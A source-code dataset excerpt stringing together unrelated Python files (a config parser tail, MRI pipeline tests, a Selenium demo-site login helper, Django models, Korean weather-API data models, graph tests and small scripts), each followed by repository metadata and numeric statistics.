self._parse_listdecl()
return self._node
def config_from_filename (fname):
return Parser ().parse (file (fname))
if __name__ == "__main__":
import sys
try:
fname = sys.argv[1]
except IndexError:
print "usage: sheriff_config.py <fname>"
sys.exit (1)
print config_from_filename (fname)
| 34.755064 | 106 | 0.572011 | 2,245 | 18,872 | 4.499777 | 0.093987 | 0.023758 | 0.033261 | 0.030489 | 0.411206 | 0.332013 | 0.243714 | 0.174421 | 0.1176 | 0.077014 | 0 | 0.002249 | 0.316819 | 18,872 | 542 | 107 | 34.819188 | 0.781277 | 0 | 0 | 0.262821 | 0 | 0 | 0.081708 | 0 | 0.002137 | 0 | 0 | 0 | 0.021368 | 0 | null | null | 0 | 0.002137 | null | null | 0.004274 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f03f062a720d101370b2aeaa19a382b35aa2aa7 | 2,203 | py | Python | test/unittests/analysis/mri/test_base.py | monashbiomedicalimaging/nianalysis | d69c38eed52ae557a849889930cd659cdb3c6401 | [
"Apache-2.0"
] | 2 | 2019-11-14T01:02:26.000Z | 2022-03-17T01:47:01.000Z | test/unittests/analysis/mri/test_base.py | MonashBI/banana | 37364243b520ab14ac1243005dbd465f824542b4 | [
"Apache-2.0"
] | 18 | 2019-04-03T04:25:55.000Z | 2020-06-08T06:00:56.000Z | test/unittests/analysis/mri/test_base.py | MonashBI/nianalysis | 37364243b520ab14ac1243005dbd465f824542b4 | [
"Apache-2.0"
] | 4 | 2018-05-23T07:13:02.000Z | 2018-08-24T04:05:31.000Z | from banana.analysis.mri.base import MriAnalysis
from banana.utils.testing import AnalysisTester, PipelineTester, TEST_CACHE_DIR
from banana import FilesetFilter
from arcana.repository.xnat import XnatRepo
class TestMriBaseDefault(AnalysisTester):
analysis_class = MriAnalysis
parameters = {'mni_tmpl_resolution': 1}
inputs = ['magnitude', 'coreg_ref']
class TestMriAnalysis(PipelineTester):
name = 'BaseMri'
analysis_class = MriAnalysis
ref_repo = XnatRepo(server='https://mbi-xnat.erc.monash.edu.au',
project_id='TESTBANANAMRI',
cache_dir=TEST_CACHE_DIR)
parameters = {
'mni_tmpl_resolution': 1}
def test_preprocess_channels_pipeline(self):
pass # Need to upload some raw channel data for this
def test_coreg_pipeline(self):
self.run_pipeline_test('coreg_pipeline')
def test_brain_extraction_pipeline(self):
self.run_pipeline_test('brain_extraction_pipeline')
def test_brain_coreg_pipeline(self):
self.run_pipeline_test('brain_coreg_pipeline',
add_inputs=['coreg_ref'])
def test_coreg_fsl_mat_pipeline(self):
self.run_pipeline_test('coreg_fsl_mat_pipeline',
add_inputs=['coreg_ref'])
def test_coreg_ants_mat_pipeline(self):
self.run_pipeline_test('coreg_ants_mat_pipeline',
add_inputs=['coreg_ref'])
def test_coreg_to_tmpl_pipeline(self):
self.run_pipeline_test('coreg_to_tmpl_pipeline',
add_inputs=['coreg_ref'],
test_criteria={
'coreg_to_tmpl': {'rms_tol': 20000}})
def test_qform_transform_pipeline(self):
self.run_pipeline_test('qform_transform_pipeline',
add_inputs=['coreg_ref'])
def test_preprocess_pipeline(self):
self.run_pipeline_test('preprocess_pipeline')
def test_header_extraction_pipeline(self):
self.run_pipeline_test('header_extraction_pipeline')
def test_motion_mat_pipeline(self):
self.run_pipeline_test('motion_mat_pipeline')
| 34.968254 | 79 | 0.663187 | 250 | 2,203 | 5.432 | 0.296 | 0.056701 | 0.11782 | 0.139912 | 0.467599 | 0.388807 | 0.343152 | 0.143594 | 0.05891 | 0 | 0 | 0.00425 | 0.252383 | 2,203 | 62 | 80 | 35.532258 | 0.820279 | 0.020427 | 0 | 0.133333 | 0 | 0 | 0.180427 | 0.065863 | 0 | 0 | 0 | 0 | 0 | 1 | 0.244444 | false | 0.022222 | 0.088889 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f06666109409538bd3e098b187da1a2987b3910 | 1,034 | py | Python | application.py | ane4katv/python_training | d8ba6dbed0b43402e8b09a5b6cf8de52703e18a1 | [
"Apache-2.0"
] | null | null | null | application.py | ane4katv/python_training | d8ba6dbed0b43402e8b09a5b6cf8de52703e18a1 | [
"Apache-2.0"
] | null | null | null | application.py | ane4katv/python_training | d8ba6dbed0b43402e8b09a5b6cf8de52703e18a1 | [
"Apache-2.0"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
class Application:
def __init__(self):
self.wd = webdriver.Chrome(executable_path='/Users/atvelova/Documents/python_training/chromedriver')
self.wd.implicitly_wait(60)
def open_page(self):
wd = self.wd
wd.get("http://hrm.seleniumminutes.com/symfony/web/index.php/auth/login")
def login(self):
wd = self.wd
self.open_page()
wd.find_element(By.ID, "txtUsername").click()
wd.find_element(By.ID, "txtUsername").send_keys("admin")
wd.find_element(By.ID, "txtPassword").send_keys("Password")
wd.find_element(By.ID, "txtPassword").send_keys(Keys.ENTER)
self.wd.implicitly_wait(60)
def logout(self):
wd = self.wd
wd.find_element(By.ID, "welcome").click()
self.wd.implicitly_wait(60)
wd.find_element(By.LINK_TEXT, "Logout").click()
def destroy(self):
self.wd.quit() | 32.3125 | 108 | 0.662476 | 140 | 1,034 | 4.742857 | 0.385714 | 0.099398 | 0.11747 | 0.135542 | 0.365964 | 0.268072 | 0.108434 | 0.108434 | 0 | 0 | 0 | 0.007264 | 0.201161 | 1,034 | 32 | 109 | 32.3125 | 0.79661 | 0 | 0 | 0.24 | 0 | 0 | 0.180676 | 0.052174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.08 | 0.12 | 0 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9f0cf9dacde698a4632f08679730078e59456da8 | 720 | py | Python | scripts/subsample_model_files.py | musicpiano/mlmicrophysics | 720e09b9003285e4e601df8befd58337bee691f5 | [
"MIT"
] | 4 | 2021-01-05T13:18:28.000Z | 2021-09-29T09:53:28.000Z | scripts/subsample_model_files.py | musicpiano/mlmicrophysics | 720e09b9003285e4e601df8befd58337bee691f5 | [
"MIT"
] | 5 | 2020-11-16T15:53:24.000Z | 2021-07-22T20:16:11.000Z | scripts/subsample_model_files.py | musicpiano/mlmicrophysics | 720e09b9003285e4e601df8befd58337bee691f5 | [
"MIT"
] | 4 | 2020-07-08T13:04:44.000Z | 2022-01-09T13:36:55.000Z | import xarray as xr
import argparse
from glob import glob
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", help="Input File Directory")
parser.add_argument("-o", "--output", help="Output file directory")
parser.add_argument("-x", "--xsub", type=int, default=2, help="X and Y subset factor")
parser.add_argument("-z", "--zsub", type=int, default=1, help="Z subset factor")
parser.add_argument("-t", "--tsub", type=int, default=1, help="Time subset factor")
args = parser.parse_args()
nc_files = sorted(glob(args.input + "*.nc"))
for nc_file in nc_files:
ds = xr.open_dataset(nc_file)
ds.close()
if __name__ == "__main__":
main() | 37.894737 | 90 | 0.652778 | 103 | 720 | 4.378641 | 0.475728 | 0.099778 | 0.18847 | 0.097561 | 0.345898 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005051 | 0.175 | 720 | 19 | 91 | 37.894737 | 0.754209 | 0 | 0 | 0 | 0 | 0 | 0.208044 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.176471 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f109b8c71bc216b9f304425a1fe0bb9187d6712 | 1,187 | py | Python | TaskManage/models.py | CooloiStudio/django-hotel-manager | dce558bfeedbb45e5d58bc875dfa936940d57ed5 | [
"MIT"
] | 1 | 2021-08-07T18:44:32.000Z | 2021-08-07T18:44:32.000Z | TaskManage/models.py | CooloiStudio/django-hotel-manager | dce558bfeedbb45e5d58bc875dfa936940d57ed5 | [
"MIT"
] | null | null | null | TaskManage/models.py | CooloiStudio/django-hotel-manager | dce558bfeedbb45e5d58bc875dfa936940d57ed5 | [
"MIT"
] | 1 | 2017-09-10T07:23:05.000Z | 2017-09-10T07:23:05.000Z | # coding: utf-8
from django.db import models
from django.contrib.auth.models import User
from RoomManage.models import Room, Customs
# Create your models here.
class Task(models.Model):
context = models.TextField()
date = models.DateTimeField()
task_status = models.CharField(max_length=20, default='undo')
user = models.ForeignKey(User)
room = models.ForeignKey(Room)
def __str__(self):
return '%s %s - %s' % (self.user.last_name, self.user.first_name, self.room.room_num)
class Attendance(models.Model):
clock_in = models.DateTimeField()
clock_out = models.DateTimeField(null=True, blank=True)
user = models.ForeignKey(User)
def __str__(self):
return '%s %s -- %s' % (self.user.last_name, self.user.first_name, self.clock_in)
class Emergency(models.Model):
date_time = models.DateTimeField()
room = models.ForeignKey(Room)
user = models.ForeignKey(User, null=True, blank=True)
def __str__(self):
return '%s %s - %s' % (self.user.last_name, self.user.first_name, self.room.room_num)
class Meta:
permissions = (
('create_emergency', 'can create a emergency'),
)
| 27.604651 | 93 | 0.676495 | 157 | 1,187 | 4.942675 | 0.343949 | 0.015464 | 0.07732 | 0.092784 | 0.257732 | 0.257732 | 0.257732 | 0.257732 | 0.257732 | 0.257732 | 0 | 0.003145 | 0.196293 | 1,187 | 42 | 94 | 28.261905 | 0.810273 | 0.032013 | 0 | 0.333333 | 0 | 0 | 0.0637 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0.111111 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
9f10e94c964ce66f7a8b92cc263cc90bcb46f403 | 400 | py | Python | test/pypendency/test_parser.py | Taschenbergerm/pypendency | d941f584cabd0e6acc56ec3df43be174198ae4b7 | [
"Apache-2.0"
] | null | null | null | test/pypendency/test_parser.py | Taschenbergerm/pypendency | d941f584cabd0e6acc56ec3df43be174198ae4b7 | [
"Apache-2.0"
] | 1 | 2021-06-23T15:05:40.000Z | 2021-06-23T15:05:40.000Z | test/pypendency/test_parser.py | Taschenbergerm/pypendency | d941f584cabd0e6acc56ec3df43be174198ae4b7 | [
"Apache-2.0"
] | null | null | null | import pathlib
import pytest
from pypendency.parser.yaml import Parser
from pypendency.lexer import LarkRelationLexer
def test_read_yaml_node_length():
file = pathlib.Path(__file__).parent / "example.yml"
lexer = LarkRelationLexer()
p = Parser(lexer=lexer, folder=pathlib.Path(__file__).parent)
g = p.parse("example.yml")
length = len(g.nodes)
pytest.assume(length == 4)
| 23.529412 | 65 | 0.73 | 52 | 400 | 5.384615 | 0.519231 | 0.1 | 0.107143 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002976 | 0.16 | 400 | 16 | 66 | 25 | 0.830357 | 0 | 0 | 0 | 0 | 0 | 0.055138 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9f1a77ebd61987c0e53368471dad9d42d5b2f750 | 548 | py | Python | mtianyan/listname.py | mtianyan/mtianyan | 6c8f3d2076da4f472f6734714f1352ffaa5264b1 | [
"Apache-2.0"
] | null | null | null | mtianyan/listname.py | mtianyan/mtianyan | 6c8f3d2076da4f472f6734714f1352ffaa5264b1 | [
"Apache-2.0"
] | null | null | null | mtianyan/listname.py | mtianyan/mtianyan | 6c8f3d2076da4f472f6734714f1352ffaa5264b1 | [
"Apache-2.0"
] | 4 | 2020-11-29T14:25:39.000Z | 2021-04-05T07:17:56.000Z | import os.path
filepathlist=[]
filenamelist=[]
def processDirectory ( args, dirname, filenames ):
for filename in filenames:
file_path=os.path.join(dirname,filename)
if os.path.isfile(file_path):
filepathlist.append(file_path)
filenamelist.append(filename)
def getpatch(path):
os.path.walk(r'%s'%path, processDirectory, None )
return filepathlist
getpatch('H:\CodePath\NoteBook\uber_input')
fw = open('data_list.txt','w')
for item in filenamelist:
fw.write(item+'\n')
| 28.842105 | 54 | 0.662409 | 67 | 548 | 5.343284 | 0.567164 | 0.067039 | 0.055866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.213504 | 548 | 18 | 55 | 30.444444 | 0.830626 | 0 | 0 | 0 | 0 | 0 | 0.092453 | 0.058491 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f1c5fd349b7d26a420b931b4c0db17b38bcc27d | 647 | py | Python | test/lit/memberfield/__init__.py | sivachandra/gala | 6d7e5fd3cf3c319062a3985dbffd791944e180e9 | [
"Apache-2.0"
] | 4 | 2016-07-16T01:35:30.000Z | 2020-06-18T05:37:33.000Z | test/lit/memberfield/__init__.py | sivachandra/gala | 6d7e5fd3cf3c319062a3985dbffd791944e180e9 | [
"Apache-2.0"
] | 7 | 2015-06-26T19:24:30.000Z | 2015-08-18T18:16:11.000Z | test/lit/memberfield/__init__.py | sivachandra/gala | 6d7e5fd3cf3c319062a3985dbffd791944e180e9 | [
"Apache-2.0"
] | null | null | null | import gdb
def print_field(f):
print("========")
print("name: %s" % f.name)
print("type: %s" % f.type)
if hasattr(f, "bitpos"):
print("bitpos: %d" % f.bitpos)
else:
print("No bitpos attribute.")
print("bitsize: %d" % f.bitsize)
print("parent_type: %s" % f.parent_type)
print("is_base_class: %s" % f.is_base_class)
print("artificial: %s" % f.artificial)
if hasattr(f, "enumval"):
print("enumval: %d" % f.enumval)
else:
print("No enumval attribute.")
derived = gdb.lookup_type("Derived")
for f in derived.fields():
print_field(f)
enum = gdb.lookup_type("EnumType")
for f in enum.fields():
print_field(f)
| 23.962963 | 46 | 0.630603 | 97 | 647 | 4.092784 | 0.309278 | 0.025189 | 0.083123 | 0.085642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173107 | 647 | 26 | 47 | 24.884615 | 0.742056 | 0 | 0 | 0.173913 | 0 | 0 | 0.264297 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.086957 | 0.608696 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
9f3b23013912e3d6b5ff12494cd3c60f642390af | 316 | py | Python | Aula07/03EstruturaDeRepeticaoFor.py | gutoffline/curso-python-2021 | 4a9a5f11188ad734402d1dafa7ea627179e7079b | [
"MIT"
] | null | null | null | Aula07/03EstruturaDeRepeticaoFor.py | gutoffline/curso-python-2021 | 4a9a5f11188ad734402d1dafa7ea627179e7079b | [
"MIT"
] | null | null | null | Aula07/03EstruturaDeRepeticaoFor.py | gutoffline/curso-python-2021 | 4a9a5f11188ad734402d1dafa7ea627179e7079b | [
"MIT"
] | null | null | null | """
for x in range(10):
print(x)
for x in range(20, 30):
print(x)
for x in range(10,100,5):
print(x)
for x in range(10,1,-1):
print(x)
print(range(10))
"""
frutas = ["maçã", "laranja", "banana", "morango"]
for x in range(len(frutas)):
print(frutas[x])
for fruta in frutas:
print(fruta)
| 13.73913 | 49 | 0.582278 | 56 | 316 | 3.285714 | 0.321429 | 0.108696 | 0.163043 | 0.298913 | 0.369565 | 0.298913 | 0.206522 | 0 | 0 | 0 | 0 | 0.073171 | 0.221519 | 316 | 22 | 50 | 14.363636 | 0.674797 | 0.528481 | 0 | 0 | 0 | 0 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f4fb4aa07286decc81511426c6486ee3fe2e5ca | 4,704 | py | Python | datagokr/kma/VilageFcstInfoService_2_0.py | uujei/datagokr | 308f5151f819010f2c4e174a6ef84d83d3bea922 | [
"MIT"
] | null | null | null | datagokr/kma/VilageFcstInfoService_2_0.py | uujei/datagokr | 308f5151f819010f2c4e174a6ef84d83d3bea922 | [
"MIT"
] | null | null | null | datagokr/kma/VilageFcstInfoService_2_0.py | uujei/datagokr | 308f5151f819010f2c4e174a6ef84d83d3bea922 | [
"MIT"
] | null | null | null | import logging
import os
from datetime import datetime
from enum import Enum
from typing import Optional
from pydantic import BaseModel, Field, HttpUrl, SecretStr, ValidationError
from ..DataGoKr import DataGoKr
# logging
logger = logging.getLogger(__file__)
# debug only
KMA_API_KEY = os.getenv("KMA_API_KEY")
################################################################################
# Types
################################################################################
# (Type)
class DataType(str, Enum):
# Only JSON Available yet
json = "JSON"
# (Type)
class VilageFcstVersionFtype(str, Enum):
ODAM = "ODAM"
VSRT = "VSRT"
SHRT = "SHRT"
################################################################################
# [Abstract] Abstract for VilageFcst
################################################################################
class VilageFcstInfo(DataGoKr):
__version__ = "2.0"
baseUrl: HttpUrl = "http://apis.data.go.kr/1360000/VilageFcstInfoService_2.0"
dataType: Optional[DataType] = "JSON" # Only JSON available yet.
serviceKey: str = KMA_API_KEY
################################################################################
# [API] 초단기 실황 UltraSrtNcst
################################################################################
# Output Model
class UltraSrtNcstModel(BaseModel):
baseDate: str
baseTime: str
T1H: Optional[float] # 10 decimal
RN1: Optional[str] # 8 code
UUU: Optional[float] # 12 float
VVV: Optional[float] # 12 float
REH: Optional[int] # 8 int
PTY: Optional[int] # 4 code
VEC: Optional[float] # 10 decimal
WSD: Optional[float] # 10 decimal
# API
class UltraSrtNcst(VilageFcstInfo):
__RecordModel__ = UltraSrtNcstModel
__index_names__ = None
__key_name__ = "category"
__value_name__ = "obsrValue"
route: str = "getUltraSrtNcst"
base_date: str = datetime.now().strftime("%Y%m%d")
base_time: str = "0500"
nx: int = 64
ny: int = 118
################################################################################
# [API] 초단기 예보 UltraSrtFcst
################################################################################
# Output Model
class UltraSrtFcstModel(BaseModel):
baseDate: str
baseTime: str
fcstDate: str
fcstTime: str
T1H: Optional[float] # 10 decimal
RN1: Optional[str] # 8 code
SKY: Optional[int] # 4 code
UUU: Optional[float] # 12 float
VVV: Optional[float] # 12 float
REH: Optional[int] # 8 int
PTY: Optional[int] # 4 code
LGT: Optional[str] # 4 code
VEC: Optional[float] # 10 decimal
WSD: Optional[float] # 10 decimal
# API
class UltraSrtFcst(VilageFcstInfo):
__RecordModel__ = UltraSrtFcstModel
__index_names__ = ["fcstDate", "fcstTime"]
__key_name__ = "category"
__value_name__ = "fcstValue"
route: str = "getUltraSrtFcst"
base_date: str = datetime.now().strftime("%Y%m%d")
base_time: str = "0500"
nx: int = 64
ny: int = 118
################################################################################
# [API] 단기 예보 VilageFcst
################################################################################
# Output Model
class VilageFcstModel(BaseModel):
baseDate: str
baseTime: str
fcstDate: str
fcstTime: str
POP: Optional[int] # 8 int
PTY: Optional[int] # 4 code
PCP: Optional[str] # 8 code
REH: Optional[int] # 8 int
SNO: Optional[str] # 8 code
SKY: Optional[int] # 4 code
TMP: Optional[float] # 10 decimal
TMN: Optional[float] # 10 decimal
TMX: Optional[float] # 10 decimal
UUU: Optional[float] # 12 float
VVV: Optional[float] # 12 float
WAV: Optional[float] # 8 int
VEC: Optional[float] # 10 decimal
WSD: Optional[float] # 10 decimal
# API
class VilageFcst(VilageFcstInfo):
__RecordModel__ = VilageFcstModel
__index_names__ = ["fcstDate", "fcstTime"]
__key_name__ = "category"
__value_name__ = "fcstValue"
route: str = "getVilageFcst"
base_date: str = datetime.now().strftime("%Y%m%d")
base_time: str = "0500"
nx: int = 64
ny: int = 118
################################################################################
# [API] 단기예보 수치모델 버전
################################################################################
# Output Model
class VilageFcstVersion(BaseModel):
filetype: VilageFcstVersionFtype
version: str
# API
class VilageFcstVersion(VilageFcstInfo):
__RecordModel__ = VilageFcstVersion
route: str = "getFcstVersion"
ftype: VilageFcstVersionFtype = "ODAM"
basedatetime: str = datetime.now().strftime("%Y%m%d0800")
| 28.682927 | 81 | 0.528699 | 453 | 4,704 | 5.309051 | 0.280353 | 0.097297 | 0.068607 | 0.100624 | 0.458212 | 0.429106 | 0.419127 | 0.419127 | 0.419127 | 0.341372 | 0 | 0.024707 | 0.182611 | 4,704 | 163 | 82 | 28.858896 | 0.60078 | 0.119048 | 0 | 0.514563 | 0 | 0 | 0.087512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.067961 | 0 | 0.980583 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9f513a1848907a84153b93f6379a41b3912f5550 | 1,807 | py | Python | test_hig.py | xiaohan2012/lst | 793944d1dd8235adbe2f651270ab12e46ff8f6f7 | [
"MIT"
] | 1 | 2016-07-05T13:10:27.000Z | 2016-07-05T13:10:27.000Z | test_hig.py | xiaohan2012/lst | 793944d1dd8235adbe2f651270ab12e46ff8f6f7 | [
"MIT"
] | null | null | null | test_hig.py | xiaohan2012/lst | 793944d1dd8235adbe2f651270ab12e46ff8f6f7 | [
"MIT"
] | null | null | null | import unittest
import networkx as nx
from nose.tools import assert_equal, assert_raises, \
assert_true
from .util import json_load
from .test_util import make_path
from hig import construct_hig_from_interactions
from interactions import InteractionsUtil as IU
class HIGTest(unittest.TestCase):
def setUp(self):
self.interactions = IU.clean_interactions(
json_load(
make_path('test/data/enron_test.json')
)
)
def test_construct_hig(self):
hig = construct_hig_from_interactions(
self.interactions
)
a, b, c, d, e, f = ('A', 'B', 'C', 'D', 'E', 'F')
assert_equal(
sorted(
range(1, 7) +
[a, b, c, d, e, f, 'XXX']
),
sorted(hig.nodes()))
print hig.edges()
assert_equal(
sorted(
[(a, 1), (1, b), (1, c), (1, d),
(a, 2), (2, f),
(d, 3), (3, e),
(a, 4), (4, b),
(d, 5), (5, f),
(6, u'XXX'), (u'XXX', 6)
]),
sorted(hig.edges())
)
def test_construct_hig_interacting_ids(self):
self.interactions.append({'sender_id': 1,
'recipient_ids': [1],
'message_id': 7})
assert_raises(ValueError,
construct_hig_from_interactions,
self.interactions)
def test_pagerank_on_hig(self):
pr = nx.pagerank(
construct_hig_from_interactions(self.interactions)
)
assert_true(pr['A'] < pr['F'])
assert_true(pr['A'] < pr['B'])
assert_true(pr['A'] < pr['C'])
assert_true(pr['A'] < pr['D'])
| 30.116667 | 62 | 0.484781 | 207 | 1,807 | 4.033816 | 0.304348 | 0.086228 | 0.076647 | 0.134132 | 0.251497 | 0.179641 | 0 | 0 | 0 | 0 | 0 | 0.017056 | 0.383509 | 1,807 | 59 | 63 | 30.627119 | 0.732496 | 0 | 0 | 0.075472 | 0 | 0 | 0.044272 | 0.013835 | 0 | 0 | 0 | 0 | 0.169811 | 0 | null | null | 0 | 0.132075 | null | null | 0.018868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f5b476a26d33e866185f1fc2f1015578a813124 | 593 | py | Python | base/shortener/admin.py | elijah74/django-url-shortener | 8934b46539748957b4be46945bea159640911434 | [
"BSD-3-Clause"
] | null | null | null | base/shortener/admin.py | elijah74/django-url-shortener | 8934b46539748957b4be46945bea159640911434 | [
"BSD-3-Clause"
] | null | null | null | base/shortener/admin.py | elijah74/django-url-shortener | 8934b46539748957b4be46945bea159640911434 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import Shortener
@admin.register(Shortener)
class ShortenerAdmin(admin.ModelAdmin):
list_display = ('id', 'short_url', 'link_url', 'status', 'created')
fields = ('short_url', 'link_url', 'status', 'created', 'modified')
readonly_fields = ('short_url', 'created', 'modified')
def save_formset(self, request, form, formset, change):
instances = formset.save(commit=False)
instances.link_url = instances.link_url.rstrip()
formset.save_m2m()
| 31.210526 | 71 | 0.693086 | 70 | 593 | 5.642857 | 0.571429 | 0.070886 | 0.060759 | 0.075949 | 0.141772 | 0.141772 | 0 | 0 | 0 | 0 | 0 | 0.004032 | 0.163575 | 593 | 18 | 72 | 32.944444 | 0.792339 | 0.035413 | 0 | 0 | 0 | 0 | 0.164912 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.25 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9f6fd9b78959476700ebfd2a923895af3dc7f59d | 250 | py | Python | gui/examples/hello_0.py | t20100/silx-training | 409656479c7fdc9f1e895c6f3f0530c7eb89cbc1 | [
"CC-BY-4.0"
] | 7 | 2017-05-02T10:03:12.000Z | 2021-06-28T14:11:32.000Z | gui/examples/hello_0.py | t20100/silx-training | 409656479c7fdc9f1e895c6f3f0530c7eb89cbc1 | [
"CC-BY-4.0"
] | 23 | 2016-11-21T17:55:11.000Z | 2021-11-24T13:43:13.000Z | gui/examples/hello_0.py | t20100/silx-training | 409656479c7fdc9f1e895c6f3f0530c7eb89cbc1 | [
"CC-BY-4.0"
] | 13 | 2016-11-17T10:47:22.000Z | 2022-02-07T09:38:47.000Z | from PyQt5.QtWidgets import QApplication, QLabel, QMainWindow
app = QApplication([])
main_window = QMainWindow()
first_widget = QLabel('hello world !!!', parent=main_window)
main_window.setCentralWidget(first_widget)
main_window.show()
app.exec_() | 25 | 61 | 0.788 | 30 | 250 | 6.333333 | 0.6 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004405 | 0.092 | 250 | 10 | 62 | 25 | 0.832599 | 0 | 0 | 0 | 0 | 0 | 0.059761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f7018c0a4594a3537d02ec23d95b4ae17544c4d | 1,101 | py | Python | kolibri/logger/test/factory_logger.py | aronasorman/kolibri | 940672bc849cd0b26d7d84ee08a34f072c4f6cd6 | [
"MIT"
] | null | null | null | kolibri/logger/test/factory_logger.py | aronasorman/kolibri | 940672bc849cd0b26d7d84ee08a34f072c4f6cd6 | [
"MIT"
] | 2 | 2017-02-08T00:22:04.000Z | 2017-06-12T20:27:44.000Z | kolibri/logger/test/factory_logger.py | aronasorman/kolibri | 940672bc849cd0b26d7d84ee08a34f072c4f6cd6 | [
"MIT"
] | null | null | null | import datetime
import factory
import uuid
from kolibri.auth.test.test_api import FacilityUserFactory
from .. import models
class ContentSessionLogFactory(factory.DjangoModelFactory):
class Meta:
model = models.ContentSessionLog
user = factory.SubFactory(FacilityUserFactory)
content_id = uuid.uuid4().hex
channel_id = uuid.uuid4().hex
